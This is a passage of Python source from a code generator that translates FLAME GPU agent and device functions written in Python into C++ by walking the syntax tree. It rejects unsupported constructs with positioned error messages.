meth = getattr(self, "_"+tree.__class__.__name__)
meth(tree)
    def RaiseWarning(self, tree, str):
        """Emit a non-fatal warning tagged with the node's source position."""
        warnings.warn(f"Warning ({tree.lineno}, {tree.col_offset}): {str}")

    def RaiseError(self, tree, str):
        """Abort translation with a CodeGenException tagged with the node's source position."""
        raise CodeGenException(f"Error ({tree.lineno}, {tree.col_offset}): {str}")
############### Cutsom Unparsing methods ###############
# These are special versions of the ast unparsing #
# dispatch functions. #
########################################################
    def dispatchMacroEnvFunction(self, tree, tree_parent):
        """
        Function will handle a getMacroEnvironment function (assuming it is correctly formatted (by checking with _deviceVariableFunctionName first))

        tree is the ast.Attribute naming the function; tree_parent is the
        enclosing ast.Call, whose argument list is mutated in place: any
        arguments after the first are converted into C++ template bounds and
        removed so they do not also appear as call arguments.
        """
        cpp_func_name = "getMacroProperty"
        py_func = tree.attr
        # extract type from function name
        py_type = py_func[len(cpp_func_name):]
        if py_type not in self._fgpu_types:
            self.RaiseError(tree, f"'{py_type}' is not a valid FLAME GPU type")
        # get cpp type
        t = self._fgpu_types[py_type]
        cpp_func_name += f"<{t}"
        # mess with the parent to extract (and remove arguments so they dont end up in the argument list)
        if not tree_parent.args :
            self.RaiseError(tree, f" Macro environment function '{py_func}' is expected to have some arguments.")
        # if more than one arg then the rest are bounds to translate
        if len(tree_parent.args) > 1:
            bounds = tree_parent.args[1:]
            # process bounds by appending to cpp function template arguments
            for i in bounds:
                if isinstance(i, ast.Num): # num required for python 3.7
                    if not isinstance(i.n, int):
                        self.RaiseError(tree, f" Macro environment function argument '{i}' should be an integer value.")
                    cpp_func_name += f", {i.n}"
                else: # all Python > 3.7
                    if not isinstance(i, ast.Constant):
                        self.RaiseError(tree, f" Macro environment function argument '{i}' should be an constant value (or Num in Python <3.8).")
                    if not isinstance(i.value, int):
                        self.RaiseError(tree, f" Macro environment function argument '{i}' should be an integer value.")
                    cpp_func_name += f", {i.value}"
            # remove bounds from argument list (in place)
            del tree_parent.args[1:]
        cpp_func_name += ">"
        self.write(cpp_func_name)
def dispatchFGPUFunctionArgs(self, tree):
"""
Handles arguments for a FLAME GPU function. Arguments must have syntax of `message_in: MessageInType, message_out: MessageOutType`
Type hinting is required to translate a type into a FLAME GPU Message type implementation
"""
# reset the locals variable stack
self._locals = ["pyflamegpu"]
if len(tree.args.args) != 2:
self.RaiseError(tree, "Expected two FLAME GPU function arguments (input message and output message)")
# input message
if not tree.args.args[0].annotation:
self.RaiseError(tree.args.args[0], "Message input requires a supported type annotation")
if not isinstance(tree.args.args[0].annotation, ast.Attribute):
self.RaiseError(tree.args.args[0], "Message input type annotation should be an attribute of the form pyflamegpu.MessageType")
if not isinstance(tree.args.args[0].annotation.value, ast.Name):
self.RaiseError(tree.args.args[0], "Message output type annotation should be an attribute of the form pyflamegpu.MessageType")
input_message_attr = tree.args.args[0].annotation.value.id + "." + tree.args.args[0].annotation.attr
if input_message_attr not in self.fgpu_message_types:
self.RaiseError(tree.args.args[0], "Message input type annotation not a supported message type")
self._input_message_var = tree.args.args[0].arg # store the message input variable name
self.write(f"flamegpu::{tree.args.args[0].annotation.attr}") # requires namespace
self.write(", ")
# output message
if not tree.args.args[1].annotation:
self.RaiseError(tree.args.args[1], "Message output requires a supported type annotation")
if not isinstance(tree.args.args[1].annotation, ast.Attribute):
self.RaiseError(tree.args.args[1], "Message output type annotation should be an attribute of the form pyflamegpu.MessageType")
if not isinstance(tree.args.args[1].annotation.value, ast.Name):
self.RaiseError(tree.args.args[1], "Message output type annotation should be an attribute of the form pyflamegpu.MessageType")
output_message_attr = tree.args.args[1].annotation.value.id + "." + tree.args.args[1].annotation.attr
if output_message_attr not in self.fgpu_message_types:
self.RaiseError(tree.args.args[1], "Message output type annotation not a supported message type")
self._output_message_var = tree.args.args[1].arg # store the message output variable name
self.write(f"flamegpu::{tree.args.args[1].annotation.attr}") # requires namespace
def dispatchType(self, tree):
"""
There is a limited set of types and formats of type description supported. Types can be either;
1) A python built in type of int or float, or
2) A subset of numpy types prefixed with either numpy or np. e.g. np.int16
This function translates and a catches unsupported types but does not translate a function call (i.e. cast)
"""
if isinstance(tree, ast.Name):
if tree.id not in self.basic_arg_types:
self.RaiseError(tree, "Not a supported type")
self.write(tree.id)
elif isinstance(tree, ast.Attribute):
if not isinstance(tree.value, ast.Name) :
self.RaiseError(tree, "Not a supported type")
if not (tree.value.id == "numpy" or tree.value.id == "np"):
self.RaiseError(tree, "Not a supported type")
if tree.attr not in self.numpytypes:
self.RaiseError(tree, "Not a supported numpy type")
self.write(self.numpytypes[tree.attr])
else:
self.RaiseError(tree, "Not a supported type")
def dispatchFGPUDeviceFunctionArgs(self, tree):
"""
Handles arguments for a FLAME GPU device function. Arguments must use type hinting to be translated to cpp.
"""
# reset the locals variable stack
self._locals = ["pyflamegpu"]
# input message
first = True
annotation = None
for arg in tree.args.args:
# ensure that there is a type annotation
if not arg.annotation:
self.RaiseError(arg, "Device function argument requires type annotation")
# comma if not first
if not first:
self.write(", ")
self.dispatchType(arg.annotation)
self.write(f" {arg.arg}")
# add arg to local variable stack
self._locals.append(arg.arg)
first = False
    def dispatchMessageIteratorCall(self, tree):
        """
        Message iterator call maybe a simple one (e.g. message_in(x, y, z)) or a call to a member (e.g. message_in.wrap())
        Using this function avoid using the global call one which may accept member function calls to things that are not iterators.
        """
        # simple case not a member function just an iterator with arguments
        if isinstance(tree.func, ast.Name):
            self.write(f"FLAMEGPU->{tree.func.id}")
        if isinstance(tree.func, ast.Attribute) :
            if isinstance(tree.func.value, ast.Name):
                # check that the iterator is supported
                if not tree.func.attr in self.fgpu_input_msg_iter_funcs:
                    self.RaiseError(tree, f"Message input loop iterator '{tree.func.attr}' is not supported.")
                self.write(f"FLAMEGPU->{tree.func.value.id}.{tree.func.attr}")
            else:
                self.RaiseError(tree, "Message input loop iterator format incorrect.")
        # handle function arguments (_CallArguments is defined later in this class)
        self.write("(")
        self._CallArguments(tree)
        self.write(")")
def dispatchMessageLoop(self, tree):
"""
This is a special case of a range based for loop in which iterator item returns a const referecne to the message.
Any user specified message value can be used.
"""
self.fill("for (const auto& ")
self.dispatch(tree.target)
self.write(" : ")
# if simple message iterator
if isinstance(tree.iter, ast.Name):
if not tree.iter.id == self._input_message_var:
self.RaiseError(t, f"Message input loop requires use of '{self._input_message_var}' as iterator.")
# write with prefix
self.write(f"FLAMEGPU->{self._input_message_var}")
# if it is a call then handle the different cases
elif isinstance(tree.iter, ast.Call):
self.dispatchMessageIteratorCall(tree.iter)
#otherwise not supported
else :
self.RaiseError(tree, f"Message input loop iterator in unsupported format")
self.write(")")
self._message_iterator_var = tree.target.id
self.enter()
self.dispatch(tree.body)
self.leave()
self._message_iterator_var = None
    def dispatchMemberFunction(self, t, t_parent):
        """
        A very limited set of function calls to members are supported so these are fully evaluated here.
        t is the ast.Attribute being called; t_parent is the Call ast object, required if the arguments need to be modified (i.e. in the case of macro environment properties).
        Function calls permitted are;
        * pyflamegpu.function - a supported function call. e.g. pyflamegpu.getVariableFloat(). This will be translated into a typed Cpp call.
        * message_input.function - a call to the message input variable (the name of which is specified in the function definition)
        * msg.function - a call to the message input iterator objection variable (the name of which is specified in the message function loop)
        * message_output.function - a call to the message output variable (the name of which is specified in the function definition)
        * pyflamegpu.environment.function - the only nested attribute type. This will be translated into a typed Cpp call.
        * math.function - Any function calls from python `math` are translated to calls raw function calls. E.g. `math.sin()` becomes `sin()`
        * numpy.type - Any numpy types are translated to static casts

        Side effect: sets t_parent.call_type for nested-attribute calls so that
        callers (and the chained-Call branch below) can validate what was handled.
        """
        # it could be possible that the Call object has no value property e.g. a()()
        if not hasattr(t, "value"):
            self.RaiseError(t, f"Function call is in an unsupported format.")
        # Nested member functions (e.g. x.y.z())
        if isinstance(t.value, ast.Attribute):
            # store some information about the source of this function call in parent as this may be useful for validation in whatever has called this function
            t_parent.call_type = None
            # only nested attribute type is environment
            if not isinstance(t.value.value, ast.Name):
                self.RaiseError(t, "Unknown or unsupported nested attribute")
            # pyflamegpu.environment
            if t.value.value.id == "pyflamegpu" and t.value.attr == "environment":
                # check it is a supported environment function
                self.write("FLAMEGPU->environment.")
                if t.attr in self.fgpu_env_funcs:
                    # proceed
                    self.write(t.attr)
                else:
                    # simple getProperty type function
                    if t.attr.startswith('getProperty') :
                        # possible getter setter type function
                        py_func = self._deviceVariableFunctionName(t, ["getProperty"])
                        if not py_func:
                            self.RaiseError(t, f"Function '{t.attr}' is not a supported pyflamegpu.environment property function.")
                        # write the getProperty type function
                        self.write(py_func)
                        t_parent.call_type = "Environment"
                    # need to catch case of getMacroProperty as arguments need to be translated into template parameters in cpp (and py_func can be ignored)
                    elif t.attr.startswith("getMacroProperty"):
                        # possible getter setter type function (Note: getMacroProperty only supports a subset of types but type checking is not performed. This is best left to the compiler.)
                        # no not permit lengths (e.g. Float4) as these will be passed as arguments
                        py_func = self._deviceVariableFunctionName(t, ["getMacroProperty"], allow_lengths=False)
                        if not py_func:
                            self.RaiseError(t, f"Function '{t.attr}' is not a supported pyflamegpu.environment macro property function.")
                        # handle case
                        self.dispatchMacroEnvFunction(t, t_parent)
                        t_parent.call_type = "MacroEnvironment"
                    else:
                        self.RaiseError(t, f"Function '{t.attr}' does not exist in pyflamegpu.environment object")
            # pyflamegpu.random
            elif t.value.value.id == "pyflamegpu" and t.value.attr == "random":
                # check it is a supported random function
                self.write("FLAMEGPU->random.")
                if t.attr in self.fgpu_rand_funcs:
                    # proceed
                    self.write(t.attr)
                else:
                    # possible getter setter type function
                    py_func = self._deviceVariableFunctionName(t, ["uniform", "normal", "logNormal"], allow_lengths=False)
                    if not py_func:
                        self.RaiseError(t, f"Function '{t.attr}' does not exist in pyflamegpu.random object")
                    # proceed
                    self.write(py_func)
                    t_parent.call_type = "Random"
            elif t.value.value.id == "pyflamegpu" and t.value.attr == "agent_out":
                # check it is a supported agent_out function
                self.write("FLAMEGPU->agent_out.")
                if t.attr in self.fgpu_agent_out_msg_funcs:
                    # proceed
                    self.write(t.attr)
                else:
                    # possible getter setter type function
                    py_func = self._deviceVariableFunctionName(t, ["setVariable"])
                    if not py_func:
                        self.RaiseError(t, f"Function '{t.attr}' does not exist in pyflamegpu.agent_out object")
                    # proceed
                    self.write(py_func)
                    t_parent.call_type = "AgentOut"
            else:
                self.RaiseError(t, f"Unknown or unsupported nested attribute in {t.value.value.id}")
        # Non nested member functions (e.g. x.y())
        elif isinstance(t.value, ast.Name):
            # pyflamegpu singleton
            if t.value.id == "pyflamegpu":
                # check for legit FGPU function calls
                self.write("FLAMEGPU->")
                if t.attr in self.fgpu_funcs:
                    # proceed
                    self.write(t.attr)
                else:
                    # possible getter setter type function
                    py_func = self._deviceVariableFunctionName(t, ["getVariable", "setVariable"])
                    if not py_func:
                        self.RaiseError(t, f"Function '{t.attr}' does not exist in pyflamegpu object")
                    # proceed
                    self.write(py_func)
            # message_in function using whatever variable was named in function declaration (e.g radius)
            elif t.value.id == self._input_message_var:
                # only process functions on message_in that are not iterators
                if t.attr in self.fgpu_input_msg_funcs:
                    self.write(f"FLAMEGPU->{self._input_message_var}.")
                    self.write(t.attr)
                else:
                    self.RaiseError(t, f"Message input variable '{self._input_message_var}' does not have a supported function '{t.attr}'")
            # message input iterator arg
            elif self._message_iterator_var and t.value.id == self._message_iterator_var:
                self.write(f"{self._message_iterator_var}.")
                # check for legit FGPU function calls and translate
                if t.attr in self.fgpu_input_msg_iter_var_funcs:
                    # proceed
                    self.write(t.attr)
                else:
                    # possible getter setter type function
                    py_func = self._deviceVariableFunctionName(t, ["getVariable"])
                    if not py_func:
                        self.RaiseError(t, f"Function '{t.attr}' does not exist in '{self._message_iterator_var}' message input iterable object")
                    # proceed
                    self.write(py_func)
            # message output arg
            elif t.value.id == self._output_message_var:
                # check for legit FGPU function calls and translate
                self.write("FLAMEGPU->message_out.")
                if t.attr in self.fgpu_output_msg_funcs:
                    # proceed
                    self.write(t.attr)
                else:
                    # possible getter setter type function
                    py_func = self._deviceVariableFunctionName(t, ["setVariable"])
                    if not py_func:
                        self.RaiseError(t, f"Function '{t.attr}' does not exist in '{self._output_message_var}' message output object")
                    # proceed
                    self.write(py_func)
            # math functions (try them in raw function call format) or constants
            elif t.value.id == "math":
                self.write(t.attr)
            # numpy types
            elif t.value.id == "numpy" or t.value.id == "np":
                if t.attr in self.numpytypes:
                    self.write(f"static_cast<{self.numpytypes[t.attr]}>")
                else:
                    self.RaiseError(t, f"Unsupported numpy type {t.attr}")
            # allow any call on any locals (too many cases to enforce without type checking)
            elif t.value.id in self._locals:
                self.write(f"{t.value.id}.{t.attr}")
            else:
                self.RaiseError(t, f"Global '{t.value.id}' identifier not supported")
        # Call is a very nested situation which can occur only on macro environment properties. E.g. 'pyflamegpu.environment.getMacroPropertyInt('a').exchange(10)'
        elif isinstance(t.value, ast.Call):
            # handle the call by recursively calling this function to do the depth first execution of pyflamegpu.environment.getMacroPropertyInt('a')
            self.dispatchMemberFunction(t.value.func, t.value)
            # check that the handler was actually for macro environment
            if t.value.call_type != "MacroEnvironment" :
                self.RaiseError(t, f"Function call {t.attr} is not supported")
            # now append the outer call by making sure the thing been called is a valid macro env function
            if not t.attr in self.fgpu_env_macro_funcs:
                self.RaiseError(t, f"Function {t.attr} is not a valid macro environment function")
            # write inner call args
            self.write("(")
            self._CallArguments(t.value)
            self.write(")")
            # write outer function (call args will be completed by _Call)
            self.write(f".{t.attr}")
        else:
            self.RaiseError(t, "Unsupported function call syntax")
############### Unparsing methods ######################
# There should be one method per concrete grammar type #
# Constructors should be grouped by sum type. Ideally, #
# this would follow the order in the grammar, but #
# currently doesn't. #
########################################################
    def _Module(self, tree):
        """Unparse a module by dispatching each of its top-level statements."""
        for stmt in tree.body:
            self.dispatch(stmt)

    def _Interactive(self, tree):
        """Unparse an interactive (REPL) node; statements are handled like a module body."""
        for stmt in tree.body:
            self.dispatch(stmt)

    def _Expression(self, tree):
        """Unparse a single-expression node (ast 'eval' mode)."""
        self.dispatch(tree.body)
# stmt
def _Expr(self, tree):
"""
Same as a standard python expression but ends with semicolon
"""
# Catch odd case of multi line strings and doc strings which are Expr with a Constant string type value
if isinstance(tree.value, ast.Constant):
if isinstance(tree.value.value, str):
return
# catch special case of Python 3.7 Where doc string is a Str and not a Constant
elif isinstance(tree.value, ast.Str):
return
# otherwise treat like a normal expression
self.fill()
self.dispatch(tree.value)
self.write(";")
    def _NamedExpr(self, tree):
        """
        Walrus operator (`x := value`). No such concept in C++, but a
        parenthesised standard assignment can be used in any location.
        """
        self.write("(")
        self.dispatch(tree.target)
        self.write(" = ")
        self.dispatch(tree.value)
        self.write(")")
    def _Import(self, t):
        # agent/device functions are self-contained; imports cannot be translated
        self.RaiseError(t, "Importing of modules not supported")

    def _ImportFrom(self, t):
        self.RaiseError(t, "Importing of modules not supported")
def _Assign(self, t):
"""
Assignment will use the auto type to define a variable at first use else will perform standard assignment.
Note: There is no ability to create `const` variables unless this is inferred from the assignment expression.
Multiple assignment is supported by cpp but not in the translator neither is assignment to complex expressions which are valid python syntax.
"""
if len(t.targets) > 1:
self.RaiseError(t, "Assignment to multiple targets not supported")
if not isinstance(t.targets[0], ast.Name):
self.RaiseError(t, "Assignment to complex expressions not supported")
self.fill()
# check if target exists in locals
if t.targets[0].id not in self._locals :
self.write("auto ")
self._locals.append(t.targets[0].id)
self.dispatch(t.targets[0])
self.write(" = ")
self.dispatch(t.value)
self.write(";")
def _AugAssign(self, t):
"""
Similar to assignment in terms of restrictions. E.g. Allow only single named variable assignments.
Also requires the named variable to already exist in scope.
"""
if not isinstance(t.target, ast.Name):
self.RaiseError(t, "Augmented assignment to complex expressions not supported")
# check if target exists in locals
if t.target.id not in self._locals :
self.RaiseError(t, "Augmented assignment not permitted on variables not already assigned previously")
self.fill()
self.dispatch(t.target)
self.write(" "+self.binop[t.op.__class__.__name__]+"= ")
self.dispatch(t.value)
self.write(";")
def _AnnAssign(self, t):
if not isinstance(t.target, ast.Name):
self.RaiseError(t, "Augmented assignment to complex expressions not supported")
self.fill()
self.dispatchType(t.annotation)
self.write(" ")
self.dispatch(t.target)
if t.value:
self.write(" = ")
self.dispatch(t.value)
self.write(";")
def _Return(self, t):
"""
Standard cpp like return with semicolon.
"""
self.fill("return")
if t.value:
self.write(" ")
self.dispatch(t.value)
self.write(";")
    def _Pass(self, t):
        # a lone ';' is the C++ equivalent of a no-op statement
        self.fill(";")

    def _Break(self, t):
        self.fill("break;")

    def _Continue(self, t):
        self.fill("continue;")
    def _Delete(self, t):
        # no C++ equivalent for `del` on arbitrary names
        self.RaiseError(t, "Deletion not supported")

    def _Assert(self, t):
        """
        cassert does exist but probably not required in FGPU functions and unclear if supported by jitfy
        """
        self.RaiseError(t, "Assert not supported")
    def _Exec(self, t):
        self.RaiseError(t, "Exec not supported")

    def _Print(self, t):
        """
        This is old school python printing so no need to support
        """
        self.RaiseError(t, "Print not supported")
    def _Global(self, t):
        self.RaiseError(t, "Use of 'global' not supported")

    def _Nonlocal(self, t):
        self.RaiseError(t, "Use of 'nonlocal' not supported")

    def _Await(self, t):
        # async constructs have no device-code equivalent
        self.RaiseError(t, "Await not supported")

    def _Yield(self, t):
        self.RaiseError(t, "Yield not supported")

    def _YieldFrom(self, t):
        self.RaiseError(t, "Yield from not supported")
    def _Raise(self, t):
        """
        Exceptions are obviously supported in cpp but not in CUDA device code
        """
        self.RaiseError(t, "Exception raising not supported")

    def _Try(self, t):
        self.RaiseError(t, "Exceptions not supported")

    def _TryExcept(self, t):
        self.RaiseError(t, "Exceptions not supported")

    def _TryFinally(self, t):
        self.RaiseError(t, "Exceptions not supported")

    def _ExceptHandler(self, t):
        self.RaiseError(t, "Exceptions not supported")

    def _ClassDef(self, t):
        # only free functions can be translated to FLAME GPU device code
        self.RaiseError(t, "Class definitions not supported")
def _FunctionDef(self, t):
    """
    Checks the decorators of the function definition which must be either 'pyflamegpu.agent_function',
    'pyflamegpu.agent_function_condition' or 'pyflamegpu.device_function'.
    Each is then processed in a different way using a specific dispatcher.
    Function calls are actually checked and only permitted (or user defined) function calls are supported.
    """
    self.write("\n")
    # check decorators
    if len(t.decorator_list) != 1 or not isinstance(t.decorator_list[0], ast.Attribute):
        self.RaiseError(t, "Function definitions require a single pyflamegpu decorator of either 'pyflamegpu.agent_function', 'pyflamegpu.agent_function_condition' or 'pyflamegpu.device_function'")
    # FLAMEGPU_AGENT_FUNCTION
    if t.decorator_list[0].attr == 'agent_function' and t.decorator_list[0].value.id == 'pyflamegpu':
        if getattr(t, "returns", False):
            self.RaiseWarning(t, "Function definition return type not supported on 'pyflamegpu.agent_function'")
        self.fill(f"FLAMEGPU_AGENT_FUNCTION({t.name}, ")
        self.dispatchFGPUFunctionArgs(t)
        self.write(")")
    # FLAMEGPU_DEVICE_FUNCTION
    elif t.decorator_list[0].attr == 'device_function' and t.decorator_list[0].value.id == 'pyflamegpu':
        self.fill(f"FLAMEGPU_DEVICE_FUNCTION ")
        if t.returns:
            self.dispatchType(t.returns)
        else:
            self.write("void")
        self.write(f" {t.name}(")
        self.dispatchFGPUDeviceFunctionArgs(t)
        self.write(")")
        # add to list of defined functions that can be called
        self._device_functions.append(t.name)
    # FLAMEGPU_AGENT_FUNCTION_CONDITION
    elif t.decorator_list[0].attr == 'agent_function_condition' and t.decorator_list[0].value.id == 'pyflamegpu':
        # check for a return annotation. ast.FunctionDef always has a 'returns'
        # attribute (None when no annotation was written) so the value must be
        # tested; hasattr() would always be True and the check would never fire.
        if t.returns is None:
            self.RaiseError(t, "Agent function conditions must have a 'bool' return type specified as a return type annotation")
        # check for return annotation type
        if not isinstance(t.returns, ast.Name):
            self.RaiseError(t, "Agent function conditions return type must be 'bool'")
        # value comparison, not identity: 'is not' on a str literal relies on
        # interning and is a SyntaxWarning on modern Python
        if t.returns.id != 'bool':
            self.RaiseError(t, "Agent function conditions return type must be 'bool'")
        # check to ensure no arguments (discard any with a warning)
        if t.args.args:
            self.RaiseWarning(t, "Agent function conditions does not support arguments. These will be discarded.")
        # write the agent function macro
        self.fill(f"FLAMEGPU_AGENT_FUNCTION_CONDITION({t.name})")
    else:
        self.RaiseError(t, "Function definition uses an unsupported decorator. Must use either 'pyflamegpu.agent_function', 'pyflamegpu.agent_function_condition' or 'pyflamegpu.device_function'")
    self.enter()
    self.dispatch(t.body)
    self.leave()
def _AsyncFunctionDef(self, t):
    # coroutines have no CUDA device-code equivalent
    self.RaiseError(t, "Async functions not supported")
def _For(self, t):
    """
    Two types of for loop are supported. Either;
    1) Message for loop in which case the format requires an iterator using the named pyflamegpu function argument of 'message_in'
    2) A range based for loop with 1 to 3 arguments which is converted into a C style loop
    """
    # if message loop then process differently
    if isinstance(t.iter, ast.Name):
        if t.iter.id == self._input_message_var:
            self.dispatchMessageLoop(t)
        else:
            self.RaiseError(t, "Range based for loops only support message iteration using 'message_in' iterator")
    # do not support for else
    elif t.orelse:
        self.RaiseError(t, "For else not supported")
    # allow calls but only to range function
    elif isinstance(t.iter, ast.Call):
        # simple function call e.g. message_in() or range()
        if isinstance(t.iter.func, ast.Name):
            # catch case of message_input with arguments (e.g. spatial messaging)
            if t.iter.func.id == self._input_message_var:
                self.dispatchMessageLoop(t)
            # otherwise permit only range based for loops
            elif t.iter.func.id == "range":
                self._dispatchRangeForLoop(t)
            else:
                self.RaiseError(t, "Range based for loops only support calls to the 'range' function")
        # member function call can only be on message_in.func() type call.
        elif isinstance(t.iter.func, ast.Attribute):
            # must be an attribute (e.g. calling a member of message_in)
            if t.iter.func.value.id == self._input_message_var:
                self.dispatchMessageLoop(t)
            else:
                self.RaiseError(t, "Range based for loops only support calling members of message input variable")
        else:
            self.RaiseError(t, "Range based for loops only support message iteration or use of 'range'")
    else:
        self.RaiseError(t, "Range based for loops only support message iteration or use of 'range'")
def _dispatchRangeForLoop(self, t):
    """
    Translate 'for x in range(...)' into a C style for loop.
    Handles the 1 (stop), 2 (start, stop) and 3 (start, stop, step) argument
    forms of 'range' with shared emission code (previously triplicated).
    NOTE(review): the generated loop always compares with '<', so a negative
    step yields a loop that never runs -- confirm whether this needs support.
    """
    args = t.iter.args
    if not 1 <= len(args) <= 3:
        self.RaiseError(t, "Range based for loops requires use of 'range' function with arguments and not keywords")
    self.fill(f"for (int ")
    self.dispatch(t.target)
    self.write("=")
    if len(args) == 1:
        self.write("0")
    else:
        self.dispatch(args[0])
    self.write(";")
    self.dispatch(t.target)
    self.write("<")
    self.dispatch(args[0] if len(args) == 1 else args[1])
    self.write(";")
    self.dispatch(t.target)
    if len(args) == 3:
        self.write("+=")
        self.dispatch(args[2])
        self.write(")")
    else:
        self.write("++)")
    self.enter()
    self.dispatch(t.body)
    self.leave()
def _AsyncFor(self, t):
    # coroutines have no CUDA device-code equivalent
    self.RaiseError(t, "Async for not supported")
def _If(self, t):
    """
    Fairly straightforward translation to if / else if / else format.
    Nested single-statement else branches that are themselves 'if' nodes are
    flattened into 'else if' clauses rather than nested blocks.
    """
    keyword = "if ("
    while True:
        self.fill(keyword)
        self.dispatch(t.test)
        self.write(")")
        self.enter()
        self.dispatch(t.body)
        self.leave()
        # an orelse holding exactly one If node is an elif: continue the chain
        if t.orelse and len(t.orelse) == 1 and isinstance(t.orelse[0], ast.If):
            t = t.orelse[0]
            keyword = "else if ("
        else:
            break
    # any remaining orelse is a genuine final else block
    if t.orelse:
        self.fill("else")
        self.enter()
        self.dispatch(t.orelse)
        self.leave()
def _While(self, t):
    """
    Straightforward translation to c style while loop
    """
    self.fill("while (")
    self.dispatch(t.test)
    self.write(")")
    self.enter()
    self.dispatch(t.body)
    self.leave()
    # 'while ... else' has no C equivalent; note the loop has already been
    # emitted by the time this raises
    if t.orelse:
        self.RaiseError(t, "While else not supported")
def _With(self, t):
    # context managers have no CUDA device-code equivalent
    self.RaiseError(t, "With not supported")
def _AsyncWith(self, t):
    self.RaiseError(t, "Async with not supported")
# expr
def _Bytes(self, t):
    self.RaiseError(t, "Byte strings and Bytes function not supported")
def _Str(self, tree):
    # force writing in double quotes
    # NOTE(review): embedded double quotes or backslashes are not escaped and
    # would produce invalid C -- confirm inputs are plain literals
    self.write(f'"{tree.s}"')
def _JoinedStr(self, t):
    self.RaiseError(t, "Joined strings not supported")
def _FormattedValue(self, t):
    self.RaiseError(t, "Formatted strings not supported")
def _fstring_JoinedStr(self, t, write):
    self.RaiseError(t, "F strings not supported")
def _fstring_Str(self, t, write):
    self.RaiseError(t, "F strings not supported")
def _fstring_Constant(self, t, write):
    self.RaiseError(t, "F strings not supported")
def _fstring_FormattedValue(self, t, write):
    self.RaiseError(t, "F strings not supported")
def _Name(self, t):
    """
    Everything ends up as a Name once it is an identifier
    """
    self.write(t.id)
def _NameConstant(self, t):
    # Required only for Python 3.7
    if t.value is None:
        # None maps to a literal zero; pass a string, every other call site
        # of write() passes str, so write(0) would be a type error
        self.write("0")
    elif t.value:
        self.write("true")
    else:
        self.write("false")
def _Repr(self, t):
    self.RaiseError(t, "Repr not supported")
def _Constant(self, t):
    """
    Restrict most types of constant except for numeric types and constant strings
    Picks up some obvious conversions such as None and Bools
    """
    value = t.value
    if isinstance(value, tuple):
        self.RaiseError(t, "Tuples not supported")
    if isinstance(value, dict):
        self.RaiseError(t, "Dictionaries not supported")
    if isinstance(value, list):
        self.RaiseError(t, "Lists not supported")
    elif value is Ellipsis:  # instead of `...` for Py2 compatibility
        self.RaiseError(t, "Ellipsis not supported")
    elif isinstance(value, str):
        self.write(f'"{value}"')
    elif isinstance(value, (bytes, bytearray)):  # reject bytes strings e.g. b'123'
        self.RaiseError(t, "Byte strings and Bytes function not supported")
    elif isinstance(value, bool):
        # bool must be tested before the numeric fallback (bool is an int subclass)
        if value:
            self.write("true")
        else:
            self.write("false")
    elif value is None:
        # identity test for None; write a string (see _NameConstant)
        self.write("0")
    else:
        self.write(repr(value))
def _Num(self, t):
    # deprecated pre-3.8 numeric node; repr of an int/float is a valid C literal
    self.write(repr(t.n))
def _List(self, t):
    self.RaiseError(t, "Lists not supported")
def _ListComp(self, t):
    self.RaiseError(t, "List comprehension not supported")
def _GeneratorExp(self, t):
    self.RaiseError(t, "Generator expressions not supported")
def _SetComp(self, t):
    self.RaiseError(t, "Set comprehension not supported")
def _DictComp(self, t):
    self.RaiseError(t, "Dictionary comprehension not supported")
def _comprehension(self, t):
    self.RaiseError(t, "Comprehension not supported")
def _IfExp(self, t):
    """
    Equivalent to a C ternary operator. The whole expression is wrapped in
    parentheses because '?:' has very low precedence in C; unparenthesised
    output nested inside another expression (e.g. 'x + c ? a : b') would
    parse as '(x + c) ? a : b' and change the meaning.
    """
    self.write("(")
    self.dispatch(t.test)
    self.write(" ? ")
    self.dispatch(t.body)
    self.write(" : ")
    self.dispatch(t.orelse)
    self.write(")")
def _Set(self, t):
    self.RaiseError(t, "Sets not supported")
def _Dict(self, t):
    self.RaiseError(t, "Dictionaries not supported")
def _Tuple(self, t):
    self.RaiseError(t, "Tuples not supported")
# Python unary operator node names mapped to their C spellings
unop = {"Invert": "~", "Not": "!", "UAdd": "+", "USub": "-"}
def _UnaryOp(self, t):
    """
    Emit the equivalent C unary operator, parenthesising the whole
    expression to preserve precedence.
    """
    operator_symbol = self.unop[t.op.__class__.__name__]
    self.write("(" + operator_symbol)
    self.dispatch(t.operand)
    self.write(")")
# Python binary operator node names mapped to their C spellings; FloorDiv,
# Pow and MatMult entries are never emitted directly (special-cased below)
binop = {"Add": "+", "Sub": "-", "Mult": "*", "MatMult": "@", "Div": "/", "Mod": "%",
         "LShift": "<<", "RShift": ">>", "BitOr": "|", "BitXor": "^", "BitAnd": "&",
         "FloorDiv": "//", "Pow": "**"}
def _BinOp(self, t):
    """
    Binary operators. Python's pow and floor division have no C operator so
    they become function calls; matrix multiplication is rejected outright.
    """
    op_name = t.op.__class__.__name__
    if op_name == "MatMult":
        self.RaiseError(t, "Matrix multiplier operator not supported")
    elif op_name == "Pow":
        # translate pow into function call (no float version)
        self.write("pow(")
        self.dispatch(t.left)
        self.write(", ")
        self.dispatch(t.right)
        self.write(")")
    elif op_name == "FloorDiv":
        # translate floor div into function call (no float version)
        self.write("floor(")
        self.dispatch(t.left)
        self.write("/")
        self.dispatch(t.right)
        self.write(")")
    else:
        # generic case: parenthesised infix expression
        self.write("(")
        self.dispatch(t.left)
        self.write(" " + self.binop[op_name] + " ")
        self.dispatch(t.right)
        self.write(")")
# Python comparison node names mapped to C spellings; Is/IsNot degrade to
# value comparison, In/NotIn are present only so lookup never KeyErrors
# (they are rejected before use)
cmpops = {"Eq": "==", "NotEq": "!=", "Lt": "<", "LtE": "<=", "Gt": ">", "GtE": ">=",
          "Is": "==", "IsNot": "!=", "In": "in", "NotIn": "not in"}
def _Compare(self, t):
    """
    Comparison operators. A Python chained comparison (a < b < c) does not
    mean the same thing in C, so each link in the chain is expanded into its
    own comparison joined with '&&', re-emitting the shared operand.
    Single comparisons are emitted exactly as before.
    """
    left = t.left
    for index, (o, e) in enumerate(zip(t.ops, t.comparators)):
        # detect list ops
        if o.__class__.__name__ == "In" or o.__class__.__name__ == "NotIn":
            self.RaiseError(t, "In and NotIn operators not supported")
        if index:
            self.write(" && ")
        self.dispatch(left)
        self.write(" " + self.cmpops[o.__class__.__name__] + " ")
        self.dispatch(e)
        left = e
# boolean operator node classes mapped to C logical operators
boolops = {ast.And: '&&', ast.Or: '||'}
def _BoolOp(self, t):
    """
    Translate to logical and/or operators in C
    """
    # parenthesise the whole expression to preserve precedence; 'interleave'
    # writes the operator string between each dispatched operand
    self.write("(")
    s = " %s " % self.boolops[t.op.__class__]
    interleave(lambda: self.write(s), self.dispatch, t.values)
    self.write(")")
def _Attribute(self, t):
    """
